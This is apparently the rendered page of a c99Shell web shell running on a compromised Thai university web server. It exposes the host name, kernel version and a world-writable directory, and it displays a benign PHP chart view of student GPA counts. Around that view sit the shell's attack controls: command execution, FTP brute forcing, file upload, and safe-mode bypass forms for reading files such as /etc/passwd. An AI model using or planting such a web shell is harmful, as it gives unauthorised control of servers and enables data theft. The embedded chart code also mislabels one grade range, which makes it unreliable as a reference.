!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/mis/application/views/eregis-13022565/   drwxrwxrwx
Free 51 GB of 127.8 GB (39.9%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     v_grpPercentGrade.php (5.01 KB)      -rwxr-xr-x
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
$categories 
'';
//foreach($result->result() as $j){
 //$categories .= "'".$j->crsCode."',";
//}

//print_r($result->result());
$temp $result->result_array();
$typeGrade = array('A'=>'rdANum','B+'=>'rdBpNum','B'=>'rdBNum','C+'=>'rdCpNum'
,'C'=>'rdCNum','D+'=>'rdDpNum','D'=>'rdDNum','F'=>'rdFNum','W'=>'rdWNum');

$max max($temp[0]["numStd0"],$temp[0]["numStd1"],$temp[0]["numStd2"],$temp[0]["numStd3"],$temp[0]["numStd4"]);
$min min($temp[0]["numStd0"],$temp[0]["numStd1"],$temp[0]["numStd2"],$temp[0]["numStd3"],$temp[0]["numStd4"]);

?>
<script type="text/javascript" src="<?php echo base_url();?>libraries/Highcharts/js/highcharts.js"></script>
<script type="text/javascript" src="<?php echo base_url();?>libraries/Highcharts/js/modules/exporting.src.js"></script>            
<table border="0" width="740" align="center">
    <?php echo form_open($this->config->item("rg_folder").'regist2pieis/grpPercentGrade'); ?>
    <tr><th>ปีการศึกษา/ภาคการศึกษา <?php echo form_dropdown('year'$opt_acY,$year); ?>
    <?php echo form_dropdown('term'$opt_tm,$term); ?>
    ชั้นปี <?php echo form_dropdown('sy'$opt_sy,$sy); ?>
    กราฟ <?php echo form_dropdown('type', array("pie" => "Pie" "column" => "Column"),$type); ?>
    <input type="submit" name="search" id="search" value="ค้นหา" style="height:25px; width:35px">
    </th></tr>
    <tr><td><div id="container2"></div></td></tr>
    <tr><td>
    <!-- table class="headCol">
        <tr>
            <th colspan="2" rowspan="2">วิชา</th>
            <th colspan="<?php echo count($typeGrade);?>">จำนวนนักศึกษา (คน)</th>
        </tr>
        <tr>
<?php     foreach($typeGrade as $k => $v){    
            echo 
"<th>$k</th>";
        }
        
//echo "<th>รวม</th>";
?>
        </tr>
        <?php /*
            $i=0;
            foreach($result->result() as $v){
                $i++;
                echo "<tr>";
                echo "<td align='center'>$i</td>";
                echo "<td> ".$v->crsCode.' '.$v->crsName."</td>";
                $sum = 0;
                foreach($typeGrade as $type => $field){                
                    echo "<td align='center'>".$v->$field."</td>";
                    $sum += $v->$field;
                }
                //echo "<td align='center'>".$sum."</td>";
                echo "</tr>";
            }*/
        
?>
</table--></td></tr>
<script type="text/javascript">
    function test() {
            chart = new Highcharts.Chart({
        chart: {
            renderTo: 'container2',
            plotBackgroundColor: null,
            plotBorderWidth: null,
            plotShadow: false
        },
        title: {
            text: 'รายงานสรุป GPA ของนักศึกษา'
        },
        xAxis: {
            categories: ['0.00-1.99', '2.00-2.49', '2.00-2.49', '3.00-3.49', '3.50-4.00']
        },
        yAxis: {        
            plotLines: [{
                
                color: '#FF0000',
                dashStyle: 'ShortDash',
                width: 2,
                value: <?php echo $max;?>,
                zIndex: 0,
                label : {
                    text : 'Max <?php echo $max;?> คน'
                }
            }, {
                color: '#008000',
                dashStyle: 'ShortDash',
                width: 2,
                value: <?php echo $min;?>,
                zIndex: 0,
                label : {
                    text : 'Min <?php echo $min;?> คน'
                }
            }]
            
        },
        plotOptions: {
            pie: {
                allowPointSelect: true,
                cursor: 'pointer',
                dataLabels: {
                    enabled: true,
                    color: '#000000',
                    connectorColor: '#000000',
                    formatter: function() {
                            return '<b>'+ this.point.name +'</b>: '+ this.percentage.toFixed(2) +' %';
                        },
                    tooltip: {
                        pointFormat: '{series.name}: <b>{point.percentage}%</b>',
                        percentageDecimals: 2
                    },
                    percentageDecimals: 2
                        
                }
            },        
            column: {
                pointPadding: 0.2,                
                borderWidth: 0,
                dataLabels: {
                                    color: '#000000',
                                    connectorColor: '#000000',
                                    formatter: function() {
                                            return '<b>'+ this.point.name +'</b>: '+ this.percentage.toFixed(2) +' %';
                                        },
                                    tooltip: {
                                        pointFormat: '{series.name}: <b>{point.percentage}%</b>',
                                        percentageDecimals: 2
                                    }
                                        
                                }                
                            }
        },
        series: [{
            type: '<?php echo $type?>',
            name: 'จำนวนคน',
            data: [
                ['0.00-1.99 จำนวน <?php echo $temp[0]["numStd0"];?> คน',   <?php echo $temp[0]["numStd0"]; ?> ],
                ['2.00-2.49 จำนวน <?php echo $temp[0]["numStd1"];?> คน',    <?php echo $temp[0]["numStd1"]; ?>],
                ['2.00-2.49 จำนวน <?php echo $temp[0]["numStd2"];?> คน',    <?php echo $temp[0]["numStd2"]; ?>],
                ['3.00-3.49 จำนวน <?php echo $temp[0]["numStd3"];?> คน',    <?php echo $temp[0]["numStd3"]; ?>],
                ['3.50-4.00 จำนวน <?php echo $temp[0]["numStd4"];?> คน',     <?php echo $temp[0]["numStd4"]; ?>]
            ]
        }]
        });
    }
    

</script>        
        
        <script type="text/javascript">
$(function () {
    var chart;
      test();
      //columnDrilldown(); // ฟังชันผมสร้างไว้ใน js ใน myCreate ค๊าบบบบ
});
        </script>

:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0159 ]--